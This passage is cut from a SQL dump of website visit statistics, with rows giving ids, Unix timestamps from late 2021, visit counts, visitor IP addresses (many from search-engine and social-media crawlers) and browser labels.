,0,'66.249.66.85','chrome'),(559520,1635330626,1,1,0,0,'66.249.66.86','chrome'),(559521,1635330989,1,1,0,0,'173.252.111.11','other'),(559522,1635330990,1,1,0,0,'173.252.111.2','other'),(559523,1635331007,1,1,0,0,'173.252.111.25','other'),(559525,1635350212,1,1,0,0,'207.46.13.103','other'),(559526,1635354098,1,1,0,0,'207.46.13.86','other'),(559527,1635355103,2,2,0,0,'178.92.251.11','chrome'),(559528,1635355857,1,1,0,0,'95.108.213.18','other'),(559529,1635360054,1,0,1,0,'66.249.66.221',''),(559530,1635364617,4,4,0,0,'106.12.77.101','firefox'),(559531,1635374284,1,1,0,0,'66.249.66.87','chrome'),(559532,1635374849,2,2,0,0,'141.98.9.3','firefox'),(559533,1635377913,1,1,0,0,'51.158.109.3','other'),(559534,1635398019,3,3,0,0,'47.74.17.225','firefox'),(559535,1635400856,1,1,0,0,'45.129.18.177','chrome'),(559536,1635403524,1,1,0,0,'91.196.178.169','chrome'),(559537,1635410186,1,1,0,0,'113.96.250.18','chrome'),(559538,1635411738,1,1,0,0,'113.96.250.18','opera'),(559539,1635411838,1,1,0,0,'94.153.72.150','chrome'),(559540,1635411839,1,1,0,0,'66.102.9.163','chrome'),(559541,1635411840,1,1,0,0,'66.102.9.168','chrome'),(559543,1635413422,1,1,0,0,'94.153.13.229','chrome'),(559544,1635413424,1,1,0,0,'66.249.83.87','chrome'),(559545,1635413436,1,1,0,0,'66.249.83.85','chrome'),(559546,1635416689,1,1,0,0,'69.30.225.181','chrome'),(559547,1635417689,1,1,0,0,'207.46.13.100','other'),(559548,1635420483,1,0,1,0,'113.96.250.18',''),(559549,1635432275,1,1,0,0,'66.249.66.85','chrome'),(559550,1635433935,1,1,0,0,'113.96.250.18','chrome'),(559551,1635436193,3,3,0,0,'113.96.250.18','chrome'),(559552,1635438525,1,1,0,0,'113.96.250.18','chrome'),(559553,1635442639,1,1,0,0,'173.252.111.3','other'),(559554,1635442640,1,1,0,0,'173.252.111.18','other'),(559556,1635442641,1,1,0,0,'173.252.111.119','other'),(559557,1635443747,1,1,0,0,'66.249.66.85','chrome'),(559558,1635444498,1,1,0,0,'66.249.66.86','chrome'),(559559,1635444909,2,2,0,0,'66.249.81.144','chrome'),(559560,1635444910,2,2,0,0,'66.249.81.146','chrome'),(559561,1635444919,1,1,0,0,'46.211.145.38','chrome'),(559562,1635444920,3,3,0,0,'66.249.83.85','chrome'),(559563,1635445330,1,1,0,0,'66.249.83.87','chrome'),(559564,1635445994,1,1,0,0,'5.45.207.88','other'),(559565,1635448474,1,0,1,0,'66.249.66.86',''),(559566,1635449141,2,2,0,0,'5.196.141.210','chrome'),(559567,1635449551,1,1,0,0,'188.119.149.69','chrome'),(559568,1635449856,1,0,1,0,'66.249.66.129',''),(559569,1635449935,1,1,0,0,'113.96.250.18','msie'),(559570,1635450012,1,1,0,0,'213.32.82.207','chrome'),(559571,1635450013,1,1,0,0,'213.32.82.207','firefox'),(559572,1635450928,1,1,0,0,'113.96.250.18','other'),(559573,1635451358,2,2,0,0,'176.31.28.239','chrome'),(559574,1635451394,1,1,0,0,'95.108.213.47','other'),(559575,1635452663,1,1,0,0,'178.32.224.4','other'),(559576,1635452664,1,1,0,0,'178.32.224.4','chrome'),(559577,1635454399,2,2,0,0,'213.32.82.217','chrome'),(559578,1635454504,1,1,0,0,'66.249.66.129','chrome'),(559579,1635454887,1,1,0,0,'66.249.66.86','chrome'),(559580,1635457324,1,0,1,0,'66.249.66.5',''),(559581,1635462504,1,1,0,0,'113.96.250.18','chrome'),(559582,1635467623,1,1,0,0,'66.249.66.7','chrome'),(559583,1635468452,1,1,0,0,'207.46.13.151','other'),(559584,1635471322,1,1,0,0,'157.55.39.188','other'),(559585,1635476926,1,0,1,0,'66.249.66.7',''),(559586,1635477012,1,1,0,0,'66.249.66.5','chrome'),(559587,1635489376,1,0,1,0,'66.249.66.85',''),(559588,1635490669,1,0,1,0,'66.249.66.86',''),(559589,1635491112,1,1,0,0,'66.249.66.87','chrome'),(559590,1635491818,1,1,0,0,'66.249.66.85','chrome'),(559591,1635493704,1,0,1,0,'66.249.66.85',''),(559592,1635496851,1,1,0,0,'113.96.250.18','chrome'),(559593,1635504644,1,1,0,0,'113.96.250.18','chrome'),(559594,1635504649,1,1,0,0,'113.96.250.18','opera'),(559595,1635509945,1,1,0,0,'113.96.250.18','chrome'),(559596,1635512607,1,0,1,0,'66.249.66.87',''),(559597,1635514265,2,2,0,0,'113.96.250.18','chrome'),(559598,1635515070,5,5,0,0,'23.172.112.119','chrome'),(559599,1635517034,1,1,0,0,'66.249.66.87','chrome'),(559600,1635528442,1,1,0,0,'113.96.250.18','chrome'),(559601,1635529549,1,1,0,0,'169.197.143.109','firefox'),(559603,1635529616,1,1,0,0,'159.65.184.79','firefox'),(559604,1635533617,1,0,1,0,'66.249.66.86',''),(559605,1635535612,2,2,0,0,'94.177.40.243','firefox'),(559607,1635539658,1,0,1,0,'66.249.66.87',''),(559608,1635543135,1,0,1,0,'66.249.66.87',''),(559609,1635545396,1,1,0,0,'207.46.13.86','other'),(559610,1635545471,1,1,0,0,'113.96.250.18','chrome'),(559611,1635558104,1,1,0,0,'109.70.106.130','other'),(559612,1635564286,1,1,0,0,'113.96.250.18','other'),(559613,1635564290,1,1,0,0,'113.96.250.18','opera'),(559614,1635564617,1,1,0,0,'113.96.250.18','chrome'),(559615,1635572471,1,1,0,0,'113.96.250.18','other'),(559616,1635575309,1,1,0,0,'66.249.93.74','chrome'),(559617,1635575310,1,1,0,0,'66.249.93.76','chrome'),(559618,1635595629,4,4,0,0,'109.70.111.112','chrome'),(559619,1635596486,1,1,0,0,'113.96.250.18','other'),(559620,1635597351,2,2,0,0,'213.32.84.9','chrome'),(559621,1635610193,1,1,0,0,'113.96.250.18','chrome'),(559622,1635610733,1,1,0,0,'113.96.250.18','msie'),(559623,1635614776,1,1,0,0,'213.180.203.137','other'),(559624,1635615814,2,2,0,0,'178.32.92.21','chrome'),(559625,1635617061,1,1,0,0,'173.252.111.23','other'),(559626,1635617063,1,1,0,0,'173.252.111.21','other'),(559627,1635619920,1,1,0,0,'113.96.250.18','other'),(559628,1635621634,1,1,0,0,'113.96.250.18','chrome'),(559629,1635622920,1,1,0,0,'207.46.13.185','other'),(559630,1635625146,1,1,0,0,'173.252.111.2','other'),(559631,1635625147,1,1,0,0,'173.252.111.25','other'),(559632,1635625948,1,0,1,0,'66.249.66.217',''),(559633,1635642036,1,1,0,0,'113.96.250.18','firefox'),(559634,1635642293,1,1,0,0,'207.46.13.185','other'),(559635,1635643805,1,1,0,0,'113.96.250.18','other'),(559636,1635646111,5,5,0,0,'37.0.8.34','chrome'),(559637,1635645772,1,0,1,0,'66.249.66.5',''),(559638,1635647182,1,1,0,0,'113.96.250.18','chrome'),(559639,1635650123,1,1,0,0,'213.180.203.62','other'),(559640,1635662196,1,1,0,0,'185.237.217.11','chrome'),(559641,1635664767,1,1,0,0,'66.249.66.85','chrome'),(559642,1635665489,2,2,0,0,'40.114.121.215','firefox'),(559643,1635666290,1,1,0,0,'66.249.66.86','chrome'),(559644,1635668301,1,0,1,0,'66.249.66.85',''),(559645,1635669317,1,1,0,0,'113.96.250.18','other'),(559646,1635677041,3,3,0,0,'113.96.250.18','chrome'),(559647,1635678694,4,4,0,0,'113.96.250.18','chrome'),(559648,1635681209,1,1,0,0,'216.145.5.42','firefox'),(559649,1635682285,3,3,0,0,'113.96.250.18','chrome'),(559650,1635684430,1,1,0,0,'66.249.66.7','chrome'),(559651,1635686948,1,1,0,0,'66.249.66.86','chrome'),(559652,1635687774,1,1,0,0,'66.249.66.221','chrome'),(559653,1635696486,2,2,0,0,'113.96.250.18','chrome'),(559654,1635697627,4,4,0,0,'113.96.250.18','other'),(559655,1635708164,1,1,0,0,'173.252.111.18','other'),(559656,1635710526,1,1,0,0,'178.128.20.62','chrome'),(559657,1635710586,1,0,1,0,'66.249.66.85',''),(559658,1635712784,11,11,0,0,'139.59.76.9','chrome'),(559659,1635719053,1,1,0,0,'66.249.66.159','chrome'),(559660,1635720568,1,1,0,0,'31.13.127.18','other'),(559661,1635720569,1,1,0,0,'31.13.127.38','other'),(559662,1635723613,1,1,0,0,'213.180.203.62','other'),(559663,1635725786,1,1,0,0,'66.249.66.217','chrome'),(559664,1635729885,1,1,0,0,'66.249.66.9','chrome'),(559665,1635737351,1,1,0,0,'65.60.10.250','firefox'),(559666,1635739351,1,1,0,0,'66.249.66.7','chrome'),(559667,1635739448,1,1,0,0,'113.96.250.18','chrome'),(559668,1635741643,1,1,0,0,'213.180.203.62','other'),(559669,1635746541,1,0,1,0,'66.249.66.86',''),(559670,1635759907,1,1,0,0,'173.252.111.13','other'),(559672,1635759910,1,1,0,0,'173.252.111.20','other'),(559674,1635761295,1,1,0,0,'113.96.250.18','chrome'),(559675,1635766315,3,3,0,0,'113.96.250.18','chrome'),(559676,1635768608,1,1,0,0,'31.13.115.116','other'),(559677,1635768609,1,1,0,0,'31.13.115.5','other'),(559678,1635774792,1,1,0,0,'66.249.66.85','chrome'),(559679,1635779205,1,1,0,0,'31.13.127.20','other'),(559680,1635779206,1,1,0,0,'31.13.127.113','other'),(559681,1635779352,3,3,0,0,'173.252.111.120','other'),(559682,1635779353,1,1,0,0,'173.252.111.118','other'),(559683,1635781382,1,0,1,0,'66.249.66.7',''),(559684,1635792838,1,1,0,0,'113.96.250.18','chrome'),(559685,1635792840,1,1,0,0,'113.96.250.18','other'),(559686,1635796459,1,0,1,0,'66.249.66.87',''),(559687,1635800657,1,1,0,0,'66.249.66.5','chrome'),(559688,1635804603,1,0,1,0,'66.249.66.85',''),(559689,1635806691,1,1,0,0,'113.96.250.18','chrome'),(559690,1635813298,1,1,0,0,'213.180.203.62','other'),(559691,1635815646,1,1,0,0,'113.96.250.18','chrome'),(559692,1635820047,5,5,0,0,'113.96.250.18','chrome'),(559693,1635834793,2,2,0,0,'137.74.27.104','firefox'),(559694,1635835725,1,1,0,0,'86.61.131.92','other'),(559695,1635835796,1,1,0,0,'113.96.250.18','other'),(559696,1635838811,2,2,0,0,'113.96.250.18','chrome'),(559697,1635839856,1,1,0,0,'91.196.178.169','chrome'),(559698,1635843754,1,1,0,0,'113.96.250.18','opera'),(559699,1635849185,1,0,1,0,'66.249.66.86',''),(559700,1635856237,1,1,0,0,'113.96.250.18','other'),(559701,1635863273,3,3,0,0,'113.96.250.18','chrome'),(559702,1635867491,2,2,0,0,'113.96.250.18','chrome'),(559703,1635868220,1,1,0,0,'31.13.127.11','other'),(559704,1635869676,1,1,0,0,'192.162.232.188','chrome'),(559705,1635871244,1,1,0,0,'159.223.89.115','chrome'),(559706,1635876496,2,2,0,0,'54.193.109.183','firefox'),(559707,1635876498,6,6,0,0,'54.193.109.183','other'),(559708,1635876826,3,3,0,0,'75.119.193.23','firefox'),(559709,1635881351,1,0,1,0,'66.249.66.9',''),(559710,1635887374,2,2,0,0,'113.96.250.18','chrome'),(559711,1635894569,1,1,0,0,'113.96.250.18','chrome'),(559712,1635902970,2,2,0,0,'121.5.109.55','chrome'),(559713,1635904087,1,1,0,0,'196.203.219.49','firefox'),(559714,1635906733,1,0,1,0,'66.249.66.25',''),(559715,1635908501,1,1,0,0,'66.249.66.217','chrome'),(559716,1635910357,1,1,0,0,'66.249.66.27','chrome'),(559717,1635917269,1,1,0,0,'23.148.145.249','firefox'),(559718,1635917413,1,1,0,0,'113.96.250.18','chrome'),(559719,1635922196,1,1,0,0,'113.96.250.18','chrome'),(559720,1635937097,3,3,0,0,'8.218.128.240','other'),(559721,1635937100,1,1,0,0,'8.218.128.240','chrome'),(559722,1635937694,1,1,0,0,'91.196.178.212','chrome'),(559723,1635944663,1,1,0,0,'91.196.178.169','chrome'),(559724,1635951183,1,1,0,0,'113.96.250.18','other'),(559725,1635953961,1,1,0,0,'91.196.178.169','chrome'),(559726,1635960450,1,1,0,0,'113.96.250.18','firefox'),(559727,1635967050,1,1,0,0,'113.96.250.18','other'),(559728,1635968407,1,0,1,0,'66.249.66.129',''),(559729,1635968504,1,0,1,0,'66.249.66.158',''),(559730,1635968779,1,1,0,0,'66.249.66.217','chrome'),(559731,1635969204,1,1,0,0,'47.242.207.58','chrome'),(559732,1635969208,2,2,0,0,'47.242.207.58','other'),(559733,1635995242,1,1,0,0,'113.96.250.18','other'),(559734,1635996790,1,1,0,0,'113.96.250.18','opera'),(559735,1636000856,1,1,0,0,'46.211.171.80','chrome'),(559736,1636000857,1,1,0,0,'66.249.83.86','chrome'),(559737,1636006008,1,1,0,0,'113.96.250.18','chrome'),(559738,1636015827,1,1,0,0,'113.96.250.18','other'),(559739,1636015955,1,1,0,0,'113.96.250.18','msie'),(559740,1636016197,1,1,0,0,'178.128.54.239','firefox'),(559741,1636023195,1,1,0,0,'159.203.107.234','other'),(559742,1636023284,1,1,0,0,'113.96.250.18','chrome'),(559743,1636026329,1,1,0,0,'167.71.85.136','other'),(559744,1636027524,1,1,0,0,'5.255.253.107','other'),(559745,1636033916,2,2,0,0,'113.96.250.18','other'),(559746,1636038687,2,2,0,0,'113.96.250.18','firefox'),(559747,1636044503,2,2,0,0,'113.96.250.18','chrome'),(559748,1636049560,1,1,0,0,'113.96.250.18','chrome'),(559749,1636052908,1,0,1,0,'66.249.66.217',''),(559750,1636054221,1,0,1,0,'66.249.66.221',''),(559751,1636055131,1,1,0,0,'113.96.250.18','chrome'),(559752,1636056995,1,1,0,0,'66.249.66.25','chrome'),(559753,1636060746,1,1,0,0,'173.252.111.119','other'),(559754,1636060770,1,1,0,0,'173.252.111.22','other'),(559755,1636060771,1,1,0,0,'173.252.111.17','other'),(559756,1636064481,1,1,0,0,'113.96.250.18','chrome'),(559757,1636065081,1,1,0,0,'207.46.13.3','other'),(559758,1636077841,1,1,0,0,'113.96.250.18','chrome'),(559759,1636079694,1,1,0,0,'113.96.250.18','other'),(559760,1636080426,1,1,0,0,'113.96.250.18','chrome'),(559761,1636081008,1,1,0,0,'113.96.250.18','other'),(559762,1636083035,1,1,0,0,'213.180.203.182','chrome'),(559763,1636084149,1,1,0,0,'113.96.250.18','other'),(559764,1636094164,2,2,0,0,'54.193.109.183','firefox'),(559765,1636094166,6,6,0,0,'54.193.109.183','other'),(559766,1636096920,1,1,0,0,'207.46.13.184','other'),(559767,1636097792,1,1,0,0,'157.55.39.111','other'),(559768,1636103446,1,1,0,0,'113.96.250.18','chrome'),(559769,1636107436,1,1,0,0,'113.96.250.18','chrome'),(559770,1636113270,1,1,0,0,'113.96.250.18','chrome'),(559771,1636114977,2,2,0,0,'113.96.250.18','opera'),(559772,1636117033,1,1,0,0,'113.96.250.18','chrome'),(559773,1636118663,1,1,0,0,'113.96.250.18','chrome'),(559774,1636123720,1,1,0,0,'23.148.145.39','firefox'),(559775,1636128027,1,1,0,0,'213.180.203.62','other'),(559776,1636143791,1,1,0,0,'113.96.250.18','chrome'),(559777,1636152587,1,1,0,0,'113.96.250.18','other'),(559778,1636162615,1,1,0,0,'113.96.250.18','chrome'),(559779,1636165922,1,1,0,0,'113.96.250.18','chrome'),(559780,1636170126,1,1,0,0,'113.96.250.18','chrome'),(559781,1636174742,1,0,1,0,'66.249.66.86',''),(559782,1636180105,1,1,0,0,'113.96.250.18','chrome'),(559783,1636187310,2,2,0,0,'113.96.250.18','firefox'),(559784,1636187686,1,1,0,0,'31.13.127.26','other'),(559785,1636187687,1,1,0,0,'31.13.127.118','other'),(559786,1636188918,1,1,0,0,'157.55.39.15','other'),(559787,1636191433,2,2,0,0,'66.249.66.87','chrome'),(559788,1636191696,1,1,0,0,'66.249.66.85','chrome'),(559789,1636193203,1,1,0,0,'66.249.66.85','chrome'),(559790,1636195367,1,0,1,0,'66.249.66.85',''),(559791,1636197224,1,1,0,0,'66.249.66.85','chrome'),(559792,1636197731,1,1,0,0,'113.96.250.18','chrome'),(559793,1636199517,1,1,0,0,'66.249.66.86','chrome'),(559794,1636200071,1,1,0,0,'66.249.66.85','chrome'),(559795,1636208326,2,1,1,0,'66.249.66.87',''),(559796,1636208834,1,1,0,0,'66.249.66.87','chrome'),(559797,1636210810,1,1,0,0,'23.228.109.147','other'),(559798,1636212461,1,1,0,0,'66.249.66.87','chrome'),(559799,1636214181,1,1,0,0,'66.249.66.86','chrome'),(559800,1636214208,2,2,0,0,'113.96.250.18','other'),(559801,1636215520,2,2,0,0,'66.249.66.86','chrome'),(559802,1636217978,1,1,0,0,'66.249.66.87','chrome'),(559803,1636218801,1,1,0,0,'113.96.250.18','opera'),(559804,1636219337,3,3,0,0,'113.96.250.18','chrome'),(559805,1636220182,1,1,0,0,'66.249.66.87','chrome'),(559806,1636223103,1,1,0,0,'66.249.66.86','chrome'),(559807,1636224302,1,1,0,0,'113.96.250.18','chrome'),(559808,1636224534,1,1,0,0,'66.249.66.85','chrome'),(559809,1636227791,1,0,1,0,'66.249.66.87',''),(559810,1636229677,1,1,0,0,'46.96.188.29','chrome'),(559811,1636229716,1,1,0,0,'173.252.107.20','other'),(559812,1636229717,1,1,0,0,'173.252.107.14','other'),(559819,1636229785,1,0,1,0,'66.249.66.129',''),(559820,1636229941,1,1,0,0,'46.211.75.57','chrome'),(559821,1636230031,1,1,0,0,'69.171.249.15','other'),(559822,1636230073,1,1,0,0,'185.237.217.25','other'),(559823,1636230075,1,1,0,0,'113.96.250.18','chrome'),(559824,1636230401,1,1,0,0,'91.196.178.57','chrome'),(559825,1636231572,1,1,0,0,'69.171.249.8','other'),(559826,1636236988,1,1,0,0,'66.249.66.221','chrome'),(559827,1636241673,1,1,0,0,'113.96.250.18','chrome'),(559828,1636247679,1,1,0,0,'66.249.66.87','chrome'),(559829,1636250681,1,1,0,0,'87.247.143.248','chrome'),(559830,1636250682,1,1,0,0,'87.247.143.248','other'),(559831,1636252513,1,1,0,0,'103.195.202.255','firefox'),(559832,1636252961,1,0,1,0,'66.249.66.9',''),(559833,1636253471,1,1,0,0,'113.96.250.18','chrome'),(559834,1636259874,1,1,0,0,'113.96.250.18','chrome'),(559835,1636264002,1,1,0,0,'69.171.231.119','other'),(559836,1636266382,1,1,0,0,'67.182.79.240','chrome'),(559837,1636266543,1,0,1,0,'66.249.66.86',''),(559838,1636268283,1,1,0,0,'66.249.66.86','chrome'),(559839,1636268885,1,1,0,0,'113.96.250.18','other'),(559840,1636269669,1,0,1,0,'66.249.66.85',''),(559841,1636271537,1,1,0,0,'185.237.217.6','chrome'),(559842,1636272170,1,1,0,0,'69.171.249.7','other'),(559843,1636281331,1,1,0,0,'113.96.250.18','chrome'),(559844,1636288638,1,1,0,0,'207.46.13.188','other'),(559845,1636290315,1,1,0,0,'207.46.13.188','other'),(559846,1636290421,2,2,0,0,'113.96.250.18','chrome'),(559847,1636298485,1,1,0,0,'87.250.224.87','other'),(559848,1636298823,1,1,0,0,'113.96.250.18','chrome'),(559849,1636300005,2,2,0,0,'113.96.250.18','chrome'),(559850,1636306758,2,2,0,0,'113.96.250.18','chrome'),(559851,1636309690,1,1,0,0,'66.249.66.158','chrome'),(559852,1636320003,1,1,0,0,'113.96.250.18','chrome'),(559853,1636321494,1,1,0,0,'113.96.250.18','chrome'),(559854,1636337641,1,1,0,0,'113.96.250.18','chrome'),(559855,1636342334,1,1,0,0,'66.249.66.9','chrome'),(559856,1636345665,1,1,0,0,'103.233.2.147','firefox'),(559857,1636347703,1,1,0,0,'113.96.250.18','msie'),(559858,1636351443,1,0,1,0,'66.249.66.86',''),(559859,1636354439,1,1,0,0,'37.73.171.216','other'),(559860,1636354443,1,1,0,0,'173.252.111.14','other'),(559862,1636354444,1,1,0,0,'173.252.111.16','other'),(559866,1636359432,1,1,0,0,'46.211.155.120','chrome'),(559867,1636365719,1,0,1,0,'91.208.197.96',''),(559868,1636369421,1,1,0,0,'66.249.66.85','chrome'),(559869,1636372249,1,1,0,0,'66.249.66.86','chrome'),(559870,1636382939,1,1,0,0,'5.45.207.95','other'),(559871,1636383602,1,1,0,0,'66.249.66.86','chrome'),(559872,1636383829,1,1,0,0,'173.252.111.5','other'),(559874,1636385100,1,1,0,0,'173.252.111.14','other'),(559875,1636386064,1,1,0,0,'66.249.66.87','chrome'),(559876,1636388625,1,0,1,0,'66.249.66.86',''),(559877,1636392056,1,1,0,0,'207.46.13.99','other'),(559878,1636395010,1,1,0,0,'156.146.63.10','chrome'),(559879,1636395938,1,1,0,0,'66.249.66.86','chrome'),(559880,1636397068,1,1,0,0,'66.249.66.86','chrome'),(559881,1636398151,1,0,1,0,'66.249.66.85',''),(559882,1636400016,1,1,0,0,'173.252.83.15','other'),(559883,1636400981,1,1,0,0,'66.249.66.87','chrome'),(559884,1636401631,1,1,0,0,'66.249.66.129','chrome'),(559885,1636402457,1,1,0,0,'217.196.161.106','chrome'),(559886,1636410199,1,1,0,0,'141.8.142.90','other'),(559887,1636411713,1,1,0,0,'66.249.66.86','chrome'),(559888,1636411812,3,3,0,0,'67.205.31.50','firefox'),(559889,1636411893,1,1,0,0,'45.129.18.137','chrome'),(559890,1636412011,1,0,1,0,'66.249.66.158',''),(559891,1636416757,1,1,0,0,'113.96.250.18','chrome'),(559892,1636420483,1,1,0,0,'66.249.66.197','chrome'),(559893,1636426445,2,2,0,0,'113.96.250.18','chrome'),(559894,1636426509,1,0,1,0,'66.249.66.5',''),(559895,1636426650,1,0,1,0,'66.249.66.129',''),(559896,1636428330,1,1,0,0,'113.96.250.18','other'),(559897,1636432559,1,1,0,0,'124.126.78.146','chrome'),(559898,1636436137,1,1,0,0,'113.96.250.18','chrome'),(559899,1636438359,1,1,0,0,'113.96.250.18','chrome'),(559900,1636444254,1,0,1,0,'66.249.66.87',''),(559901,1636446172,1,1,0,0,'66.249.66.86','chrome'),(559902,1636449901,1,1,0,0,'113.96.250.18','chrome'),(559903,1636459386,11,11,0,0,'146.59.206.243','chrome'),(559904,1636462196,1,1,0,0,'113.96.250.18','chrome'),(559905,1636474619,1,1,0,0,'113.96.250.18','chrome'),(559906,1636482006,1,1,0,0,'66.249.66.7','chrome'),(559907,1636484291,1,1,0,0,'113.96.250.18','other'),(559908,1636495122,1,0,1,0,'66.249.66.5',''),(559909,1636502349,1,1,0,0,'20.212.18.109','firefox'),(559910,1636514347,1,1,0,0,'113.96.250.18','chrome'),(559911,1636516114,1,1,0,0,'66.249.66.7','chrome'),(559912,1636516709,1,1,0,0,'194.156.95.216','other'),(559913,1636516710,1,1,0,0,'194.156.95.216','opera'),(559914,1636521876,1,1,0,0,'207.46.13.19','other'),(559915,1636524615,1,1,0,0,'113.96.250.18','chrome'),(559916,1636530892,1,0,1,0,'66.249.66.86',''),(559917,1636533832,1,1,0,0,'20.121.113.7','chrome'),(559918,1636536511,1,1,0,0,'113.96.250.18','chrome'),(559919,1636540523,1,1,0,0,'113.96.250.18','chrome'),(559920,1636548086,1,1,0,0,'113.96.250.18','other'),(559921,1636548385,1,1,0,0,'31.13.103.17','other'),(559922,1636548386,1,1,0,0,'31.13.103.12','other'),(559923,1636552130,1,1,0,0,'66.249.66.85','chrome'),(559924,1636553576,2,2,0,0,'34.134.127.81','chrome'),(559925,1636555402,5,5,0,0,'35.206.196.117','chrome'),(559926,1636556958,1,1,0,0,'66.249.66.86','chrome'),(559927,1636559049,1,1,0,0,'66.249.66.86','chrome'),(559928,1636560570,1,0,1,0,'66.249.66.85',''),(559929,1636562411,1,1,0,0,'113.96.250.18','chrome'),(559930,1636566872,1,1,0,0,'66.249.66.87','chrome'),(559931,1636569673,1,1,0,0,'66.249.66.87','chrome'),(559932,1636569892,1,1,0,0,'113.96.250.18','chrome'),(559933,1636570389,1,1,0,0,'161.35.122.2','chrome'),(559934,1636571063,3,3,0,0,'139.59.36.139','firefox'),(559935,1636571701,1,1,0,0,'113.96.250.18','other'),(559936,1636572613,1,1,0,0,'113.96.250.18','other'),(559937,1636573982,2,2,0,0,'217.196.161.106','chrome'),(559938,1636574728,1,0,1,0,'66.249.66.86',''),(559939,1636575050,1,1,0,0,'207.46.13.128','other'),(559940,1636576104,1,0,1,0,'66.249.66.86',''),(559941,1636584153,1,1,0,0,'113.96.250.18','chrome'),(559942,1636590995,2,2,0,0,'54.88.203.213','firefox'),(559943,1636593009,1,1,0,0,'66.249.66.201','chrome'),(559944,1636607843,1,0,1,0,'66.249.66.86',''),(559945,1636608307,1,0,1,0,'66.249.66.87',''),(559946,1636608933,1,1,0,0,'27.112.79.82','firefox'),(559947,1636613604,1,1,0,0,'91.196.178.163','chrome'),(559948,1636618826,1,0,1,0,'66.249.66.86',''),(559949,1636628458,1,1,0,0,'54.145.87.82','other'),(559950,1636628758,1,1,0,0,'185.100.72.19','other'),(559951,1636634482,1,1,0,0,'207.46.13.19','other'),(559952,1636635438,1,1,0,0,'18.235.255.67','other'),(559953,1636665244,1,0,1,0,'66.249.66.87',''),(559954,1636667562,1,1,0,0,'13.57.254.83','chrome'),(559955,1636667964,1,1,0,0,'157.55.39.6','other'),(559956,1636672048,1,0,1,0,'66.249.66.87',''),(559957,1636676506,11,11,0,0,'54.175.135.0','chrome'),(559958,1636677182,1,0,1,0,'66.249.66.85',''),(559959,1636677232,1,1,0,0,'66.249.66.86','chrome'),(559960,1636691895,1,1,0,0,'34.245.224.67','other'),(559961,1636702846,1,0,1,0,'66.249.66.85',''),(559962,1636702923,1,1,0,0,'66.249.66.87','chrome'),(559963,1636705023,1,0,1,0,'66.249.66.86',''),(559964,1636713866,1,1,0,0,'157.55.39.6','other'),(559965,1636716281,5,5,0,0,'35.77.14.203','chrome'),(559966,1636723742,5,5,0,0,'35.77.14.203','chrome'),(559967,1636729952,1,0,1,0,'66.249.66.85',''),(559968,1636733054,1,1,0,0,'173.252.111.24','other'),(559969,1636733055,1,1,0,0,'173.252.111.23','other'),(559971,1636733341,1,1,0,0,'113.96.250.18','other'),(559972,1636734881,3,3,0,0,'173.252.111.5','other'),(559979,1636734882,2,2,0,0,'173.252.111.4','other'),(559985,1636735825,2,2,0,0,'113.96.250.18','msie'),(559986,1636736479,1,1,0,0,'31.13.103.111','other'),(559987,1636736482,1,1,0,0,'31.13.103.15','other'),(559988,1636736487,1,1,0,0,'31.13.103.6','other'),(559989,1636736489,1,1,0,0,'31.13.103.5','other'),(559990,1636736496,1,1,0,0,'31.13.103.18','other'),(559991,1636736497,1,1,0,0,'31.13.103.4','other'),(559992,1636736604,1,1,0,0,'113.96.250.18','chrome'),(559993,1636737476,1,1,0,0,'31.13.103.17','other'),(559994,1636737498,1,1,0,0,'173.252.111.17','other'),(559996,1636745649,1,1,0,0,'173.252.111.19','other'),(559997,1636745650,1,1,0,0,'173.252.111.116','other'),(559998,1636752859,1,1,0,0,'173.252.127.28','other'),(559999,1636755510,1,1,0,0,'113.96.250.18','chrome'),(560000,1636757418,1,0,1,0,'66.249.66.85',''),(560001,1636759230,1,1,0,0,'66.249.92.151','other'),(560002,1636759717,11,11,0,0,'15.223.30.212','chrome'),(560003,1636778070,1,1,0,0,'31.13.103.24','other'),(560005,1636778071,1,1,0,0,'31.13.103.20','other'),(560009,1636778290,1,1,0,0,'31.13.103.118','other'),(560014,1636778291,1,1,0,0,'31.13.103.9','other'),(560025,1636778886,1,1,0,0,'113.96.250.18','other'),(560026,1636784114,1,1,0,0,'113.96.250.18','other'),(560027,1636787064,1,1,0,0,'101.133.153.105','firefox'),(560028,1636790705,1,0,1,0,'66.249.66.85',''),(560029,1636795891,1,1,0,0,'113.96.250.18','firefox'),(560030,1636799350,1,1,0,0,'113.96.250.18','chrome'),(560031,1636806066,1,1,0,0,'113.96.250.18','firefox'),(560032,1636806775,1,1,0,0,'157.55.39.48','other'),(560033,1636807971,1,1,0,0,'113.96.250.18','chrome'),(560034,1636812540,1,1,0,0,'113.96.250.18','chrome'),(560035,1636820836,1,1,0,0,'113.96.250.18','chrome'),(560036,1636822244,1,1,0,0,'113.96.250.18','chrome'),(560037,1636823162,1,1,0,0,'69.63.189.116','other'),(560038,1636833794,1,1,0,0,'113.96.250.18','chrome'),(560039,1636839319,1,1,0,0,'66.249.66.86','chrome'),(560040,1636851884,1,0,1,0,'66.249.66.197',''),(560041,1636852163,3,3,0,0,'3.144.183.252','firefox'),(560042,1636854419,1,1,0,0,'113.96.250.18','chrome'),(560043,1636856988,1,1,0,0,'113.96.250.18','chrome'),(560044,1636861635,1,1,0,0,'113.96.250.18','other'),(560045,1636866126,2,2,0,0,'113.96.250.18','chrome'),(560046,1636870324,1,1,0,0,'66.249.66.85','chrome'),(560047,1636870523,1,1,0,0,'69.63.184.6','other'),(560048,1636880737,1,0,1,0,'66.249.66.86',''),(560049,1636880901,1,1,0,0,'113.96.250.18','chrome'),(560050,1636887090,1,1,0,0,'113.96.250.18','msie'),(560051,1636890888,1,1,0,0,'113.96.250.18','other'),(560052,1636891280,1,1,0,0,'31.13.127.4','other'),(560053,1636891281,1,1,0,0,'31.13.127.111','other'),(560054,1636892071,2,2,0,0,'45.89.173.198','chrome'),(560055,1636895875,2,2,0,0,'113.96.250.18','chrome'),(560056,1636899199,1,1,0,0,'66.249.66.85','chrome'),(560057,1636907239,1,1,0,0,'113.96.250.18','other'),(560058,1636914305,1,1,0,0,'66.249.66.86','chrome'),(560059,1636918480,1,1,0,0,'207.46.13.128','other'),(560060,1636924651,1,1,0,0,'113.96.250.18','other'),(560061,1636940648,2,2,0,0,'113.96.250.18','chrome'),(560062,1636941690,1,1,0,0,'113.96.250.18','chrome'),(560063,1636945490,1,1,0,0,'113.96.250.18','firefox'),(560064,1636951376,1,1,0,0,'113.96.250.18','other'),(560065,1636953615,1,1,0,0,'113.96.250.18','other'),(560066,1636959431,1,1,0,0,'66.249.66.85','chrome'),(560067,1636962875,1,1,0,0,'85.17.88.170','firefox'),(560068,1636965447,1,0,1,0,'66.249.